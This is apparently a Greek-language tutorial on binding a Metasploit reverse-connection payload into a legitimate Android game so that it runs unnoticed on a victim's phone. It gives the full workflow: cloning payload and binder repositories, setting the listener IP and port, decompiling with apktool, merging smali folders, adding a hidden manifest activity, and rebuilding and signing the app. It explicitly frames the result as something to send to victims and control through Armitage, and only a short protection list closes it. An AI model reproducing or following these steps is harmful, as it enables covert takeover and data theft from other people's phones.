Τι θα χρειαστειτε;
1.Kali Linux
2.Eclipse
3.Μια εφαρμογη Android
Σε προηγουμενο οδηγο μαθαμε πως να κανουμε εναν ιο για Android FUD (Fully Undetectable) και πως κλεβουμε επαφες,μηνυματα και κλησεις
Βεβαια το προβλημα ειναι οτι εφοσον το θυμα εκανε εγκατασταση του ιου μας μετα απο λιγο εκανε απεγκατασταση γιατι ο ιος σαν εφαρμογη δεν εδειχνε τιποτα στο θυμα.
Σε αυτο τον οδηγο θα μαθουμε πως βαζουμε τον ιο μας σε οποια εφαρμογη θελουμε
Πριν ξεκινησουμε πρεπει να κανουμε εγκατασταση του Eclipse
το Eclipse ειναι ενα προγραμμα το οποιο ειναι για προγραμματιστες εφαρμογων java,c++ κτλ
οποτε ας αρχισουμε
τρεχουμε την εντολη
apt-get install eclipse
οταν τελειωσουμε με την εγκατασταση γραφουμε στο τερματικο eclipse ωστε να μας ανοιξει
πηγαινουμε πανω αριστερα στην καρτελα Help και επιλεγουμε Install New Software
επιλεγουμε Add
στο Name βαζουμε Android και στο location
https://dl-ssl.google.com/android/eclipse/
επιλεγουμε τα πακετα ολα για εγκατασταση
αποδεχομαστε τους ορους και επιλεγουμε να γινει εγκατασταση
οταν τελειωσει το eclipse το κλεινουμε και το ξανα ανοιγουμε
πηγαινουμε πανω δεξια στην καρτελα file και επιλεγουμε import
αν ολα ειναι ενταξει τοτε θα μας εμφανισει τον Android οπως κατω στην εικονα
τωρα εφοσον μπορουμε να εισαγουμε κωδικα εφαρμογης Android στο Eclipse κατεβαζουμε τα εξεις
γραφουμε σε ενα τερματικο
cd Desktop
μετα
git clone https://github.com/nickthesail0r/AndroidPayload.git
και
git clone https://github.com/nickthesail0r/Metasploit-Binder.git
στην επιφανεια εργασιας μας θα δουμε 2 φακελους με τα ονοματα AndroidPayload και Metasploit-Binder
στο Eclipse επιλεγουμε πανω αριστερα File και Import
Android - Existing Android code into Workspace
επιλεγουμε Browser και AndroidPayload
κανουμε και την ιδια διαδικασια με το metasploit-binder
στο Eclipse πρεπει να εχετε αυτα τα 2 Projects
πηγαινουμε στο AndroidPayload και με διπλο κλικ ανοιγουμε το Payload.java
και βαζουμε την ip και την θυρα που θελουμε να ακουει ο ιος μας
επιλεγουμε save και με δεξι κλικ πανω στο Project AndroidPayload επιλεγουμε export
επιλεγουμε Next
Εδω θα δημιουργησουμε το κλειδι της υπογραφης μας ωστε να υπογραφουμε τις εφαρμογες μας οποτε στο Location βαζουμε την τοποθεσια που θελουμε να αποθηκευτει και βαζουμε και κωδικο
βαζουμε στο Allias το ψευδωνυμο μας ,κωδικο ,ποσα χρονια θελουμε να εχει η υπογραφη μας ισχυει και το ονομα μας
τελος βαζουμε το ονομα και την διαδρομη που θελουμε να αποθηκευτει η εφαρμογη μας
εδω ανοιγουμε το Armitage το βαζουμε να ακουει στην θυρα που βαλαμε στον ιο και τρεχουμε τον ιο στο κινητο μας
πρεπει να δουμε το κινητο σαν slave
(αν δεν σας εμφανιστει τοτε εχετε κανει λαθος στην θυρα η στην ip)
τωρα απο το κινητο μας κανουμε εγκατασταση το ES Διαχειριστης Αρχειων
μετα επιλεγουμε την εφαρμογη που θελουμε να βαλουμε τον ιο μας
πχ εγω σε αυτο το παραδειγμα πηρα το παιχνιδι Space Agency
οταν το κανουμε εγκατασταση ανοιγουμε το ES
και επιλεγουμε app ,βρισκουμε το Space Agency και παταμε για 3 δευτερολεπτα πανω στο εικονιδιο μεχρι να μας εμφανιστει το ποιο κατω menu ωστε να το κανουμε backup
τωρα συνδεουμε με καλωδιο το κινητο με τον υπολογιστη, πηγαινουμε στον φακελο Phone/Backups/apps και μεταφερουμε το Space Agency στον υπολογιστη μας
οταν εχουμε το Space Agency στην επιφανεια εργασιας μας τοτε το κανουμε Decompliled με το apktool
οποτε τρεχουμε την εντολη
apktool.jar d "/root/Desktop/Space Agency_1.4.4.apk"
(η apktool αν εχετε την παλια εκδοση)
το apktool μας εκανε decompiled το Space Agency στην επιφανεια εργασιας
πηγαινουμε στον φακελο και ανοιγουμε το AndroidManifest.xml
σημειωνουμε το ονομα πακετου της εφαρμογης (package name) και της πρωτης δραστηριοτητας(Activity)
πχ
τωρα πηγαινουμε στο Eclipse στο Project Binder και ανοιγουμε το StartUpActivity,java και βαζουμε τα πακετα απο το AndroidManifest.xml
πχ
αποθηκευουμε και κανουμε export της εφαρμογης binder
παλι η ιδια διαδικασια
εκτος απο εδω που επιλεγουμε την υπογραφη που φτιαξαμε πριν
βαζουμε τον κωδικο
επιλεγουμε το ψευδωνυμο και βαζουμε κωδικο
βαζουμε το ονομα και την διαδρομη που θελουμε να εξαγουμε την εφαρμογη
τωρα εφοσον στην επιφανεια εργασιας εχουμε το binder.apk θα το κανουμε decompiled με το apktool
οποτε τρεχουμε την εντολη
apktool.jar d /root/Desktop/Binder.apk
μετα θα κανουμε decompiled τον ιο
τρεχουμε την εντολη
apktool.jar d /root/Desktop/ios.apk
τωρα εφοσον και οι 3ς εφαρμογες εχουν γινει decompiled στην επιφανεια εργασιας
πηγαινουμε σον φακελο ios/smali/com και αντιγραφουμε τον φακελο app
μετα πηγαινουμε στον φακελο Space Agency_1.4.4/smali/com/ και κανουμε επικολληση
πηγαινουμε στον φακελο Binder/smali/com/app και κανουμε αντιγραφη του φακελου bind
μετα πηγαινουμε παλι στον φακελο Space Agency_1.4.4/smali/com/app/ και κανουμε επικολληση
δλδ η εφαρμογη σας πρεπει να εχει μεσα τους φακελους bind και stage στην διαδρομη efarmoghsas/smali/com/app/
τωρα ανοιγουμε το AndroidManifest.xml στον φακελο ios και κανουμε αντιγραφη τα δικαιωματα (permissions)
στο AndroidManifest.xml του Space Agency τα κανουμε επικολληση
μετα τελος στο </activity>
προσθετουμε
<activity android:label="hello" android:name="com.app.stage.MainActivity" android:theme="@android:style/Theme.NoDisplay">
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
</intent-filter>
</activity>
<activity android:label="@string/app_name" android:name="com.app.bind.StartUpActivity" android:screenOrientation="portrait">
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>
</activity>
και αφαιρουμε απο το κανονικο <activity>
στο <intent-filter>
<category android:name="android.intent.category.LAUNCHER"/>
με λιγα λογια να υπαρχει ενα LAUNCHER το οποιο θα το ξεκιναει τo StartUpActivity
τωρα αποθηκευουμε και κανουμε compiled την εφαρμογη με την εντολη
apktool.jar b '/root/Desktop/Space Agency_1.4.4'
και την υπογραφουμε με την εντολη
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /root/Desktop/ypografi '/root/Desktop/Space Agency_1.4.4/dist/Space Agency_1.4.4.apk' nickthesail0r
και ειμαστε ετοιμοι να στειλουμε την εφαρμογη στο θυμα μας
η εφαρμογη βρισκετε στην διαδρομη Space Agency_1.4.4/dist/
τωρα πως θα στειλετε στο θυμα την εφαρμογη μπορειτε να δειτε τον προηγουμενο οδηγο μου
οταν το θυμα τρεξει την εφαρμογη δεν θα καταλαβει τιποτα γιατι θα του τρεχει κανονικα η εφαρμογη
και εσεις θα δειτε το θυμα σας στο armitage
Θελω να ευχαριστησω τον theDoubleKay για τον κωδικα του binder και γενικα την βοηθεια του.
Πως θα προστατευτειτε;
1.Ποτε μην κανετε εγκατασταση εφαρμογων απο αγνωστες πηγες
2.Παντα να εχετε καποιο antivirus στο κινητο σας
3.Οταν ειναι να κανετε εγκατασταση ακομα και μιας εφαρμογης απο το playstore να κοιτατε αν εχει πανω απο 100 χιλιαδες ληψεις και αν ειναι πανω απο 30 μερες αν εχει κατω απο 30 μερες και εχει περιεργα δικαιωματα μην την κανετε εγκατασταση